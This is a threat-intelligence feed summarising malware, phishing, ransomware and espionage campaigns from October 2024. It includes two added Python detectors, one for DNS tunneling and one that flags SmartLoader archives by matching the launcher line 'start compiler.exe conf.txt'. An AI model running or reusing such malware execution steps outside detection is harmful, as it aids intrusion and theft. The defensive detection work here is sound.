Source: https://web-assets.esetstatic.com/wls/en/papers/white-papers/marketplace-scams.pdf
2024-10-10
Threat_Actors_Using_Havoc_Framework
LOW
Intel Source:
BI.ZONE
Intel Name:
Threat_Actors_Using_Havoc_Framework
Date of Scan:
2024-10-10
Impact:
LOW
Summary:
Researchers at BI.ZONE have observed that attackers are increasingly employing pentesting tools such as the Havoc framework to circumvent cybersecurity solutions. This tool is less widespread than others, such as Cobalt Strike or Metasploit, making it more difficult to identify. In this campaign, the Mysterious Werewolf group took a similar approach to the Mythic framework. Phishing emails, which frequently impersonate trustworthy institutions, remain a popular strategy for attackers to acquire access.
Source: https://bi.zone/eng/expertise/blog/khaos-v-kiberprostranstve-gruppirovki-eksperimentiruyut-s-instrumentami/
2024-10-10
Malicious_Clockify_Ads_Distribute_Malware
LOW
Intel Source:
Palo Alto
Intel Name:
Malicious_Clockify_Ads_Distribute_Malware
Date of Scan:
2024-10-10
Impact:
LOW
Summary:
Unit42 researchers have observed that on October 8, 2024, a malicious Google ad led users to a counterfeit Clockify site distributing malware. The site offered two downloads: a 704 kB disk image (DMG) for Mac and a 115.7 MB executable for Windows. The Mac DMG contained a Mach-O executable that varied in file hash, name, and size with each download, and was designed to exfiltrate data from macOS systems after bypassing user warnings and password prompts. In contrast, the Windows executable consistently delivered a 116.5 MB MSI installer, which included Lumma Stealer. This infection process involved retrieving Lumma Stealer from a password-protected RAR file.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-11-08-IOCs-for-malware-from-fake-Clockify-site.txt
2024-10-10
Exposed_Server_Reveals_Cyberattack_Tools
LOW
Intel Source:
Hunt.IO
Intel Name:
Exposed_Server_Reveals_Cyberattack_Tools
Date of Scan:
2024-10-10
Impact:
LOW
Summary:
Researchers from Hunt.IO have identified a cybercriminal's server containing DDoS scripts, SpyNote spyware disguised as popular programs, phishing pages targeting digital currency organizations, and ransom notes. A simple Python script, ddos.py, attempted to target a non-profit website in Israel that promotes accessibility for individuals with limitations.
Source: https://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages
2024-10-10
New_Unicode_Skimmer_Targets_Ecommerce_Data
LOW
Intel Source:
Jscrambler
Intel Name:
New_Unicode_Skimmer_Targets_Ecommerce_Data
Date of Scan:
2024-10-10
Impact:
LOW
Summary:
The Jscrambler researchers have identified a new digital skimmer campaign utilizing Unicode obfuscation techniques, known as the Mongolian Skimmer. The skimmer's script is heavily obfuscated with accented and invisible Unicode characters, making it difficult for humans to read. It leverages JavaScript's flexibility to hide malicious functionality, primarily aimed at stealing sensitive information from e-commerce checkout and admin pages, which is then sent to an attacker-controlled server.
Source: https://jscrambler.com/blog/the-mongolian-skimmer
2024-10-10
Crypto_Stealing_Malware_Campaign
LOW
Intel Source:
Doctor Web
Intel Name:
Crypto_Stealing_Malware_Campaign
Date of Scan:
2024-10-10
Impact:
LOW
Summary:
Researchers from Doctor Web have discovered a malware campaign that has affected 28,000 users, primarily in Russia, but also in Belarus, Uzbekistan, Kazakhstan, Ukraine, and Turkey. The attackers use fake YouTube videos and GitHub repositories to trick victims into downloading password-protected archives; once the archive is opened and the password is entered, malicious scripts and files are installed on the victim's computer. The malware communicates with the attackers through the Ncat network utility and sends collected system information via a Telegram bot. It delivers two payloads: a miner that uses the victim's computer to mine cryptocurrency, and a clipper that steals cryptocurrency by replacing wallet addresses in the clipboard.
Source: https://news.drweb.com/show/?i=14920&lng=en
2024-10-10
Attackers_Use_Bitbucket_to_Distribute_AsyncRAT
MEDIUM
Intel Source:
G DATA
Intel Name:
Attackers_Use_Bitbucket_to_Distribute_AsyncRAT
Date of Scan:
2024-10-10
Impact:
MEDIUM
Summary:
Researchers at GDATA have recently investigated a sophisticated attack campaign utilizing a multi-stage approach to deliver AsyncRAT through Bitbucket, a popular code hosting platform. This tactic leverages the platform's legitimacy and accessibility, allowing attackers to host malicious payloads like Predator stealer, Azorult stealer, and STOP ransomware without raising suspicion.
Source: https://www.gdatasoftware.com/blog/2024/10/38043-asyncrat-bitbucket
2024-10-09
Horus_Protector
LOW
Intel Source:
SonicWall
Intel Name:
Horus_Protector
Date of Scan:
2024-10-09
Impact:
LOW
Summary:
Researchers at SonicWall have discovered a new malware distribution service called Horus Protector. This service is used to distribute various types of malware such as AgentTesla, Remcos, Snake, and NjRat. The creator of this tool is French-speaking and communicates with users through a Telegram group, where they provide updates and offer different service packages from $50 to $150 per month. The tool uses a .zip file containing a VBE script to distribute malware, and collects unique information from the user's machine and sends it to the server.
Source: https://blog.sonicwall.com/en-us/2024/10/horus-protector-part-1-the-new-malware-distribution-service/
2024-10-09
From_Perfctl_to_InfoStealer
LOW
Intel Source:
ISC.SANS
Intel Name:
From_Perfctl_to_InfoStealer
Date of Scan:
2024-10-09
Impact:
LOW
Summary:
SANS researchers have recently noted that a new stealthy malware named perfctl, which targets Linux hosts, has gained attention. Although the malware has already been thoroughly analyzed, a copy of its "httpd" binary was tested in a lab environment. The malware was deployed without root privileges, which resulted in behavior similar to its expected operation but with some limitations. Specifically, it was unable to write to certain file locations due to lack of access, and the rootkit features were not activated, causing the malware to operate more visibly.
Source: https://isc.sans.edu/diary/rss/31334
2024-10-09
Operation_MiddleFloor
MEDIUM
Intel Source:
Checkpoint
Intel Name:
Operation_MiddleFloor
Date of Scan:
2024-10-09
Impact:
MEDIUM
Summary:
Checkpoint researchers have identified a disinformation campaign called Operation MiddleFloor, which is targeting the government and education sectors of Moldova. The attackers aim to influence the country's upcoming elections on EU membership by using fake emails and documents that appear to come from the European Commission or Moldovan ministries. These emails spread false information on topics such as gas prices, LGBT rights, anti-corruption measures and immigration to create fear regarding Moldova's potential EU membership. The campaign also collects personal information from the victims for future attacks. Lying Pigeon is believed to be behind this campaign, based on its TTPs, its Russian-speaking operators and its links to Russian interests.
Source: https://research.checkpoint.com/2024/disinformation-campaign-moldova/
2024-10-09
Rhysida_Ransomware_Group
MEDIUM
Intel Source:
Recorded Future
Intel Name:
Rhysida_Ransomware_Group
Date of Scan:
2024-10-09
Impact:
MEDIUM
Summary:
Researchers at Insikt Group have identified the multi-layered infrastructure of the Rhysida ransomware group. This infrastructure includes typo-squatted domains, SEO poisoning, and payload servers for the initial infection. The group uses tools such as CleanUpLoader for data exfiltration and Zabbix for monitoring. Rhysida operates as RaaS and employs double extortion tactics, which involve stealing data and threatening to leak it if the ransom isn't paid. The group primarily targets critical sectors such as education, healthcare, and infrastructure such as the Port of Seattle to steal sensitive personal data such as passports and identification documents. It uses various methods to gain access, such as phishing, exploiting vulnerabilities, stolen credentials, lack of MFA and malvertising that tricks users into downloading malware.
Source: https://go.recordedfuture.com/hubfs/reports/cta-2024-1009.pdf
2024-10-09
New_Malware_Pronsis_Loader
MEDIUM
Intel Source:
Trustwave
Intel Name:
New_Malware_Pronsis_Loader
Date of Scan:
2024-10-09
Impact:
MEDIUM
Summary:
Researchers at Trustwave have discovered a new malware called Pronsis Loader, with its earliest variant identified in November 2023. It shares similarities with the D3F@ck Loader, which emerged in January 2024, particularly in using JPHP-compiled executables that allow for easy interchangeability. However, they differ in their installation methods: D3F@ck Loader employs the Inno Setup installer, while Pronsis Loader utilizes the Nullsoft Scriptable Install System (NSIS). Pronsis Loader has been observed delivering various malware variants, including Lumma Stealer and Latrodectus.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pronsis-loader-a-jphp-driven-malware-diverging-from-d3fck-loader/
2024-10-09
Lua_Malware_Targets_Educational_Sector
LOW
Intel Source:
Morphisec
Intel Name:
Lua_Malware_Targets_Educational_Sector
Date of Scan:
2024-10-09
Impact:
LOW
Summary:
Researchers from Morphisec Threat Labs have identified a new Lua malware targeting the educational sector, mainly the student gamer community. The malware has been distributed across North America, South America, Europe, Asia, and Australia. It often spreads through platforms such as GitHub, where users looking for game cheats mistakenly download malicious files. The malware is delivered in ZIP files that include a Lua compiler, a DLL file, a Lua script, and a batch file. Once the batch file is run, the malware connects to a C2 server to receive instructions such as staying hidden or downloading more malicious software. This malware installs infostealers such as Redline that collect user credentials to be sold on the dark web for further attacks.
Source: https://blog.morphisec.com/threat-analysis-lua-malware
2024-10-09
DPRK_Hackers_Target_Tech_Job_Seekers_with_Malware
LOW
Intel Source:
Palo Alto
Intel Name:
DPRK_Hackers_Target_Tech_Job_Seekers_with_Malware
Date of Scan:
2024-10-09
Impact:
LOW
Summary:
Researchers at Palo Alto have found that North Korean hackers are posing as recruiters in order to lure tech job seekers into installing malware. This operation is known as the "CL-STA-240 Contagious Interview" campaign. Since their initial mention in November 2023, these hackers have updated two malware variants: BeaverTail and InvisibleFerret. The BeaverTail malware targets both macOS and Windows, and the InvisibleFerret backdoor has been updated as well.
Source: https://unit42.paloaltonetworks.com/north-korean-threat-actors-lure-tech-job-seekers-as-fake-recruiters/
2024-10-08
A_New_MisterioLNK_Loader_Builder
LOW
Intel Source:
Cyble
Intel Name:
A_New_MisterioLNK_Loader_Builder
Date of Scan:
2024-10-08
Impact:
LOW
Summary:
CRIL researchers have discovered a new loader called MisterioLNK, which is available as open source on GitHub. This tool helps attackers create different types of loader files, such as HTA, BAT, CMD, VBS, and LNK, which download and execute malicious software without being easily detected. It allows users to customize the icons of LNK files to make them appear more legitimate. This makes MisterioLNK a powerful tool for cybercriminals, as it can be used to distribute malware such as Remcos RAT, DC RAT, and BlankStealer.
Source: https://cyble.com/blog/misteriolnk-the-open-source-builder-behind-malicious-loaders/
2024-10-08
SSLoad_Distributed_by_New_PhantomLoader_Malware
LOW
Intel Source:
ANY RUN
Intel Name:
SSLoad_Distributed_by_New_PhantomLoader_Malware
Date of Scan:
2024-10-08
Impact:
LOW
Summary:
PhantomLoader is a sophisticated malware disguised as a legitimate 32-bit DLL associated with the 360 Total Security antivirus software. Recently, it has been found masquerading as PatchUp.exe, a genuine software module. Unique in its approach, PhantomLoader employs binary patching to embed itself within legitimate executables, utilizing self-modifying techniques to decrypt and load a new Rust-based malware called SSLoad into memory. Analysis of SSLoad in ANY.RUN's sandbox revealed that one distribution method involves phishing emails containing malicious Office documents, which trigger the infection chain.
Source: https://any.run/cybersecurity-blog/phantomloader-and-ssload-analysis/
2024-10-08
The_Dark_Angels_Ransomware_Group
MEDIUM
+
Intel Source:
Zscaler
Intel Name:
The_Dark_Angels_Ransomware_Group
Date of Scan:
2024-10-08
Impact:
MEDIUM
Summary:
Researchers from Zscaler have profiled a ransomware group called Dark Angels, which emerged in 2022. The group operates from Russian-speaking regions and targets organisations across the U.S., Europe, South America and Asia. It runs its own leak site on the dark web, named Dunghill Leak, to publish stolen information. The group uses third-party ransomware payloads such as Babuk and RTM Locker to encrypt Windows systems and RagnarLocker for Linux/ESXi systems. Dark Angels gains initial access through phishing emails and the exploitation of software vulnerabilities, and often spends days or weeks transferring large volumes of stolen data before deploying ransomware or demanding payment to prevent a data leak.
Source: https://www.zscaler.com/blogs/security-research/shining-light-dark-angels-ransomware-group#indicators-of-compromise--iocs-
2024-10-08
GoldenJackal_Targets_Air_Gapped_Systems
LOW
+
Intel Source:
ESET
Intel Name:
GoldenJackal_Targets_Air_Gapped_Systems
Date of Scan:
2024-10-08
Impact:
LOW
Summary:
Researchers at ESET have discovered that the GoldenJackal cyberespionage group targeted air-gapped systems in a campaign running from May 2022 to March 2024, focused on a European government institution. GoldenJackal used custom tools to reach isolated systems, collect and exfiltrate sensitive data, and relay commands across the network.
Source: https://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/
2024-10-07
New_DNS_Tunneling_Campaigns_Uncovered
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
New_DNS_Tunneling_Campaigns_Uncovered
Date of Scan:
2024-10-07
Impact:
MEDIUM
Summary:
Researchers from Palo Alto Networks have discovered four previously unknown DNS tunneling campaigns using their newly implemented campaign monitoring system. DNS tunneling lets threat actors pass data through firewalls that permit DNS traffic, creating a covert channel for data exfiltration. The monitoring system identifies tunneling domains by examining shared characteristics and correlations between malicious activities.
Source: https://unit42.paloaltonetworks.com/detecting-dns-tunneling-campaigns/
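The Unit 42 post describes a correlation system; the heuristic below is an added example written for this entry, not code from Unit 42 or from the feed. It scores DNS query names per apex domain on three properties a tunnel cannot avoid showing (many distinct subdomains, long labels, high label entropy) and flags an apex only when all three exceed their thresholds. The query log, the apex tunnel-example.net and the thresholds are constructed assumptions; the "last two labels" apex split is a simplification and a real deployment should use the public suffix list.

```python
import hashlib
import math
from collections import defaultdict


def build_sample_queries():
    """Constructed DNS query log as (client IP, queried name) pairs; not real telemetry.

    The example.com entries are ordinary hostnames. The tunnel-example.net entries
    (a hypothetical apex) imitate a host exfiltrating data one chunk per query:
    each chunk is hex-encoded into a long, high-entropy label. sha256 stands in
    for the encoded/encrypted payload a real tunnel would carry.
    """
    queries = [
        ("10.0.0.5", "www.example.com"),
        ("10.0.0.5", "mail.example.com"),
        ("10.0.0.7", "cdn.example.com"),
        ("10.0.0.7", "api.example.com"),
        ("10.0.0.9", "login.example.com"),
    ]
    for i in range(40):
        chunk = hashlib.sha256(f"chunk-{i}".encode()).hexdigest()[:48]
        queries.append(("10.0.0.9", f"{chunk}.t.tunnel-example.net"))
    return queries


def split_apex(qname):
    """Return (subdomain, apex). Naive last-two-label apex; production code should
    use the public suffix list so names under co.uk and similar are not misparsed."""
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) <= 2:
        return "", qname.lower()
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def shannon_entropy(text):
    """Bits per character of the given string (0.0 for an empty string)."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def score_apexes(queries, min_unique=20, min_avg_len=20.0, min_entropy=3.5):
    """Aggregate per-apex statistics and flag apexes that look like tunnels.

    A tunnel needs many distinct subdomains (one per chunk, so resolver caching
    never short-circuits the query), long labels (to carry payload) and high
    entropy (encoded or encrypted data). All three must hold for an apex to be
    flagged, which keeps a CDN with a few long but repeated hostnames below the bar.
    """
    subs_by_apex = defaultdict(set)
    for _client, qname in queries:
        sub, apex = split_apex(qname)
        if sub:
            subs_by_apex[apex].add(sub)
    report = {}
    for apex, subs in subs_by_apex.items():
        avg_len = sum(len(s) for s in subs) / len(subs)
        entropy = shannon_entropy("".join(s.replace(".", "") for s in subs))
        report[apex] = {
            "unique_subdomains": len(subs),
            "avg_subdomain_len": avg_len,
            "entropy": entropy,
            "flagged": len(subs) >= min_unique
            and avg_len >= min_avg_len
            and entropy >= min_entropy,
        }
    return report


def tunneling_candidates(queries, **thresholds):
    """Sorted list of apexes flagged by score_apexes()."""
    report = score_apexes(queries, **thresholds)
    return sorted(apex for apex, stats in report.items() if stats["flagged"])


if __name__ == "__main__":
    for apex, stats in score_apexes(build_sample_queries()).items():
        print(apex, stats)
```

The thresholds are starting points, not tuned values: on real resolver logs the unique-subdomain count should be measured per client and per time window, and legitimate high-volume services (anti-virus lookups, CDN tokens) need an allow list before the entropy test is trusted.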
2024-10-07
Awaken_Likho_Targets_Russian_Agencies
LOW
+
Intel Source:
Securelist
Intel Name:
Awaken_Likho_Targets_Russian_Agencies
Date of Scan:
2024-10-07
Impact:
LOW
Summary:
Researchers from Securelist have found a new campaign by the Awaken Likho APT group that targeted Russian government entities and organizations between June and August 2024. The attackers switched from the UltraVNC module to MeshAgent, the agent of the legitimate MeshCentral remote-management platform, for remote access.
Source: https://securelist.com/awaken-likho-apt-new-implant-campaign/114101/
2024-10-07
Mamba_2FA_A_New_AiTM_Phishing_Tool
LOW
+
Intel Source:
Sekoia
Intel Name:
Mamba_2FA_A_New_AiTM_Phishing_Tool
Date of Scan:
2024-10-07
Impact:
LOW
Summary:
Sekoia researchers have identified a phishing campaign that uses fake Microsoft 365 login pages to steal user credentials. The phishing pages are delivered as HTML attachments and are designed to bypass multi-factor authentication (MFA). The researchers also identified a new tool, Mamba 2FA, used in this campaign: it works as an adversary-in-the-middle proxy that captures user credentials and sends them to the attackers through a Telegram bot. Mamba 2FA is sold on Telegram as a phishing-as-a-service (PhaaS) kit that lets attackers generate phishing links and HTML attachments for $250 per month. The phishing pages also mimic the branding of the targeted companies to appear more legitimate.
Source: https://blog.sekoia.io/mamba-2fa-a-new-contender-in-the-aitm-phishing-ecosystem/
2024-10-07
Cuckoo_Threat_Actor_Arsenal_Explored
LOW
+
Intel Source:
Cybereason
Intel Name:
Cuckoo_Threat_Actor_Arsenal_Explored
Date of Scan:
2024-10-07
Impact:
LOW
Summary:
Cybereason researchers have observed the activities of the threat actor known as APT10 in a campaign named Cuckoo Spear. The campaign deploys two primary malware tools, NOOPLDR and NOOPDOOR. NOOPLDR is a DLL loader that establishes persistence on compromised systems by registering as a Windows service, obfuscates its code, and injects shellcode retrieved from the registry. NOOPDOOR is a backdoor that loads and decrypts shellcode stored in the registry, enabling the threat actor to execute commands and control the infected system remotely.
Source: https://www.cybereason.com/blog/cuckoo-spear-pt2-threat-actor-arsenal
2024-10-07
Google_Ads_campaign_targets_utility_software
LOW
+
Intel Source:
MalwareBytes
Intel Name:
Google_Ads_campaign_targets_utility_software
Date of Scan:
2024-10-07
Impact:
LOW
Summary:
Researchers from Malwarebytes have discovered a campaign in which users searching for software such as Slack, Notion, Calendly, Odoo and Basecamp are targeted through malicious Google ads. The ads look legitimate and appear at the top of Google search results to trick users into downloading malware. Windows users are redirected to GitHub to download the Rhadamanthys infostealer, while Mac users receive a variant of the AMOS (Atomic Stealer) infostealer. The malware steals passwords and other sensitive information and sends it to a server located in Russia.
Source: https://www.malwarebytes.com/blog/news/2024/10/large-scale-google-ads-campaign-targets-utility-software
2024-10-07
Yunit_Stealer
LOW
+
Intel Source:
Cyfirma
Intel Name:
Yunit_Stealer
Date of Scan:
2024-10-07
Impact:
LOW
Summary:
Cyfirma researchers have discovered a new malware called Yunit Stealer that steals sensitive information such as login credentials, browser data and cryptocurrency wallets. The malware can modify system settings, create scheduled tasks and disable Windows Defender to stay hidden. It uses JavaScript tooling to gather system information, run commands and send data over the network, and the stolen data is delivered to the attackers through messaging platforms such as Telegram and Discord.
Source: https://www.cyfirma.com/research/yunit-stealer/
2024-10-05
CyberVolk_Ransomware_updates
LOW
+
Intel Source:
Rapid7
Intel Name:
CyberVolk_Ransomware_updates
Date of Scan:
2024-10-05
Impact:
LOW
Summary:
Researchers from Rapid7 have profiled a politically motivated hacktivist group called CyberVolk, which has moved into ransomware. The group is aligned with pro-Russian interests and times its activity around geopolitical events. Its operations increased after the arrest of members of another hacktivist group, NoName057(16), which had been targeting NATO-aligned countries; in response, CyberVolk launched coordinated DDoS and ransomware attacks against Spain, where the NoName members were detained, affecting 27 organisations.
Source: https://www.rapid7.com/blog/post/2024/10/03/ransomware-groups-demystified-cybervolk-ransomware/
2024-10-05
Perfctl_Malware_Targeting_Linux_Servers
MEDIUM
+
Intel Source:
Aqua
Intel Name:
Perfctl_Malware_Targeting_Linux_Servers
Date of Scan:
2024-10-05
Impact:
MEDIUM
Summary:
Researchers from Aqua have identified a Linux malware called Perfctl that has targeted millions of Linux servers over the last few years. The malware exploits over 20,000 types of misconfiguration as well as vulnerabilities in servers across the globe. It uses rootkits to hide its presence, communicates over TOR, and masquerades as legitimate system processes to avoid detection. Once on a system, Perfctl deletes its own binary after running, copies itself to other locations under fake names, and keeps running in the background as a service. It also modifies login scripts so that it is executed every time someone logs into the server.
Source: https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/
2024-10-05
Prince_Ransomware
MEDIUM
+
Intel Source:
Proofpoint
Intel Name:
Prince_Ransomware
Date of Scan:
2024-10-05
Impact:
MEDIUM
Summary:
Proofpoint researchers have uncovered a campaign distributing Prince Ransomware to targets in the UK and the U.S. The attackers impersonate Royal Mail, the British postal service, to deliver the ransomware, which is freely available on GitHub. They send their lures both through website contact forms and by email from Proton Mail addresses, with each message coming from a different address. The ransomware encrypts files, appends the ".womp" extension and displays a fake Windows Update screen to disguise the process. The encrypted files cannot be decrypted, which suggests that the purpose is destruction rather than financial gain.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-royal-mail-lures-deliver-open-source-prince-ransomware
2024-10-04
Ukrainian_Phishing_Emails_Deliver_RMS_Malware
LOW
+
Intel Source:
Palo Alto
Intel Name:
Ukrainian_Phishing_Emails_Deliver_RMS_Malware
Date of Scan:
2024-10-04
Impact:
LOW
Summary:
Palo Alto Networks researchers observed that on October 1, 2024, phishing emails with a payment-order theme and a malicious PDF attachment were distributed in Ukraine. Three examples were identified, targeting the Ukrainian government and a US university email address. The PDF spoofed a Ukraine-based bank and contained a link to a now-defunct Bitbucket repository hosting a malicious 7-Zip archive.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-10-01-IOCs-for-RMS-based-malware.txt
2024-10-04
Vilsa_Stealer
LOW
+
Intel Source:
Cyfirma
Intel Name:
Vilsa_Stealer
Date of Scan:
2024-10-04
Impact:
LOW
Summary:
CYFIRMA researchers have identified a new malware called Vilsa Stealer on GitHub, notable for the speed and effectiveness with which it extracts sensitive data. The tool is easy to use and includes security-bypass capabilities, making it a significant threat for covert data collection. Vilsa Stealer targets a wide range of personal and system information, including browser credentials, tokens, browsing history and financial details.
Source: https://www.cyfirma.com/research/vilsa-stealer/
2024-10-04
Bulbature_and_GobRAT_Infrastructure_Analysis
LOW
+
Intel Source:
Sekoia
Intel Name:
Bulbature_and_GobRAT_Infrastructure_Analysis
Date of Scan:
2024-10-04
Impact:
LOW
Summary:
Researchers at Sekoia discovered, in mid-2023, an infrastructure that turns compromised edge devices into Operational Relay Boxes (ORBs) used to stage cyberattacks. A total of 63 servers were located and evaluated, and the infrastructure was still operational when the report was published. Some servers host installation scripts and the GobRAT and Bulbature malware, while others provide management interfaces for controlling compromised hosts and launching attacks.
Source: https://blog.sekoia.io/bulbature-beneath-the-waves-of-gobrat/#h-indicators-of-compromise
2024-10-04
Hidden_Malware_in_Free_Software
LOW
+
Intel Source:
Securelist
Intel Name:
Hidden_Malware_in_Free_Software
Date of Scan:
2024-10-04
Impact:
LOW
Summary:
Researchers at Securelist have described a campaign that targets people looking for free software or game cheats. The attackers used a range of techniques to take complete control of systems, mainly for cryptocurrency mining; some of the malware can also replace cryptocurrency wallet addresses and take screenshots. Securelist noted unusual approaches such as turning security software (an open-source SIEM agent) into a backdoor and hiding malicious files behind valid digital signatures, which makes detection harder.
Source: https://securelist.com/miner-campaign-misuses-open-source-siem-agent/114022/
2024-10-04
Lumma_Stealer_Campaign_Linked_to_GitHub_Accounts
LOW
+
Intel Source:
Palo Alto
Intel Name:
Lumma_Stealer_Campaign_Linked_to_GitHub_Accounts
Date of Scan:
2024-10-04
Impact:
LOW
Summary:
Researchers at Palo Alto Networks (Unit 42) have identified an active campaign, tracked since July 31, 2024, that uses SmartLoader to distribute Lumma Stealer. The infection chain relies primarily on a private GitHub account named user-attachments, along with several other accounts. The campaign uses zip archives hosted on these GitHub accounts that consistently contain four files: compiler.exe, conf.txt, Launcher.bat and lua51.dll. The infection starts when Launcher.bat runs the command start compiler.exe conf.txt. All four files must be present in the same directory for the infection to succeed, although the file hashes and sizes vary between zip archives.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-10-03-IOCs-for-SmartLoader-to-Lumma-Stealer.txt
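Because the hashes change between archives but the four file names and the launcher line do not, a name-based triage check is more durable than hash matching. The script below is an added example written for this entry (not Unit 42 code and not from the feed): it walks a zip archive, groups entries by directory, and reports any directory that holds all four files and whose Launcher.bat contains the reported start line. The sample archives are constructed in memory with placeholder bytes in place of the binaries, so nothing here is malware.

```python
import io
import posixpath
import re
import zipfile

# The four names reported as constant across the SmartLoader archives (hashes vary, names do not).
REQUIRED_NAMES = {"compiler.exe", "conf.txt", "launcher.bat", "lua51.dll"}
# The launcher line from the write-up; match loosely on whitespace and case.
LAUNCH_LINE = re.compile(rb"\bstart\s+compiler\.exe\s+conf\.txt\b", re.IGNORECASE)


def find_smartloader_sets(zip_bytes):
    """Return the archive directories that hold the complete four-file set.

    A directory counts only if all four names are present there (case-insensitive,
    because the chain needs them side by side) and its Launcher.bat contains the
    'start compiler.exe conf.txt' line. File hashes are deliberately not used.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        by_dir = {}
        for info in zf.infolist():
            if info.is_dir():
                continue
            directory, name = posixpath.split(info.filename)
            by_dir.setdefault(directory, {})[name.lower()] = info.filename
        for directory, names in sorted(by_dir.items()):
            if not REQUIRED_NAMES.issubset(names):
                continue
            with zf.open(names["launcher.bat"]) as bat:
                # Only the head of the batch file is needed; avoids reading a padded file.
                if LAUNCH_LINE.search(bat.read(4096)):
                    hits.append(directory)
    return hits


def build_sample_archive(include_dll=True, launcher_line=b"start compiler.exe conf.txt\r\n"):
    """Constructed lure archive for testing; the binaries are placeholder bytes, not malware."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Installer/README.txt", "constructed sample\n")
        zf.writestr("Installer/compiler.exe", b"MZ placeholder, not a real PE\n")
        zf.writestr("Installer/conf.txt", b"placeholder config bytes\n")
        zf.writestr("Installer/Launcher.bat", b"@echo off\r\n" + launcher_line)
        if include_dll:
            zf.writestr("Installer/lua51.dll", b"MZ placeholder, not a real DLL\n")
    return buf.getvalue()


if __name__ == "__main__":
    print("complete set :", find_smartloader_sets(build_sample_archive()))
    print("missing DLL  :", find_smartloader_sets(build_sample_archive(include_dll=False)))
```

To run it over real downloads, read each archive's bytes and pass them to find_smartloader_sets(); an empty list means the archive does not carry the full set. The check is intentionally narrow, so a renamed lua51.dll or a different launcher command will not match and should be covered by a separate rule.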
2024-10-03
New_MedusaLocker_Ransomware_Variant_Discovered
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
New_MedusaLocker_Ransomware_Variant_Discovered
Date of Scan:
2024-10-03
Impact:
MEDIUM
Summary:
Researchers from Cisco Talos have identified a financially motivated threat actor, active since late 2022, spreading a new MedusaLocker ransomware variant known as "BabyLockerKZ." The actor initially targeted European countries, but since mid-2023 its focus has shifted to South America, with a corresponding rise in victims. The variant, created by the same developer, uses distinct autorun keys and additional sets of registry keys.
Source: https://blog.talosintelligence.com/threat-actor-believed-to-be-spreading-new-medusalocker-variant-since-2022/
2024-10-03
Meow_and_Meow_Leaks_Ransomware_Group
MEDIUM
+
Intel Source:
Bitdefender
Intel Name:
Meow_and_Meow_Leaks_Ransomware_Group
Date of Scan:
2024-10-03
Impact:
MEDIUM
Summary:
Bitdefender researchers have examined two ransomware groups, Meow and Meow Leaks, and note that it is unclear whether they are linked or are two separate entities. Meow first emerged in 2022 and operates as Ransomware-as-a-Service (RaaS), targeting organizations in countries such as the United States, the UK, Nigeria and Italy. It gains access through zero-day exploits or other vulnerabilities, encrypts files with the .meow extension, and demands ransom payments via email or Telegram. Meow Leaks, by contrast, first emerged in 2023 and focuses on exfiltrating data from victim organisations rather than encrypting systems, selling the data on a dark-web marketplace called "Market Meow Leaks". It targets sectors such as government, healthcare, education, technology and finance in countries including the U.S., the UK, Germany and Japan, and uses communication platforms such as Jabber, TOX and Matrix instead of Telegram.
Source: https://www.bitdefender.com/blog/businessinsights/meow-meow-leaks-and-the-chaos-of-ransomware-attribution/
2024-10-03
FIN7_Uses_Fake_AI_Sites_to_Spread_Malware
LOW
+
Intel Source:
Silent Push
Intel Name:
FIN7_Uses_Fake_AI_Sites_to_Spread_Malware
Date of Scan:
2024-10-03
Impact:
LOW
Summary:
Researchers at Silent Push have discovered that FIN7 is using fake websites advertising an AI "DeepNude Generator" to spread malware. The group set up at least seven separate websites offering two download flows: a direct download and one using a fake "free trial." FIN7 is also running a separate campaign in which pop-up ads prompt visitors to install a browser extension that ultimately delivers malware.
Source: https://www.silentpush.com/blog/fin7-malware-deepfake-ai-honeypot/
2024-10-03
CeranaKeeper_New_China_Group_Targeting_Thailand
MEDIUM
+
Intel Source:
ESET
Intel Name:
CeranaKeeper_New_China_Group_Targeting_Thailand
Date of Scan:
2024-10-03
Impact:
MEDIUM
Summary:
Researchers from ESET have identified CeranaKeeper, a new China-aligned threat actor that targets Thai government organizations. Some of its tools were previously attributed to Mustang Panda by other researchers. The group frequently updates its backdoor to avoid detection and varies its techniques to support large-scale data exfiltration, abusing legitimate cloud and file-sharing services such as Dropbox and OneDrive as covert backdoor and exfiltration channels.
Source: https://www.welivesecurity.com/en/eset-research/separating-bee-panda-ceranakeeper-making-beeline-thailand/
2024-10-03
JavaScript_Role_in_Spear_Phishing_Attacks
LOW
+
Intel Source:
NVISO Labs
Intel Name:
JavaScript_Role_in_Spear_Phishing_Attacks
Date of Scan:
2024-10-03
Impact:
LOW
Summary:
Researchers at NVISO Labs have analyzed how attackers increasingly use JavaScript in spear phishing campaigns. They highlight various techniques cybercriminals employ, such as leveraging malicious scripts to bypass security measures and enhance the effectiveness of their attacks.
Source: https://blog.nviso.eu/2024/10/02/all-that-javascript-for-spear-phishing/
2024-10-03
The_Zoom_Phishing_Threat
LOW
+
Intel Source:
Cofense
Intel Name:
The_Zoom_Phishing_Threat
Date of Scan:
2024-10-03
Impact:
LOW
Summary:
Researchers from Cofense have identified a phishing campaign targeting Microsoft accounts through legitimate Zoom Docs links. The campaign sends what looks like an official invitation for a Contract Bid Proposal from no-reply@zoom.us, a genuine Zoom address, to create a sense of urgency and trust. When users click the "Download Secure Attachment" link in the email, they are taken to a real Zoom Docs page, which makes the message seem trustworthy. If a user then clicks the malicious link from a Windows device, they are redirected to a fake Microsoft login page that steals their credentials; the attackers specifically target Windows users.
Source: https://cofense.com/blog/from-collaboration-to-deception-the-zoom-phishing-threat
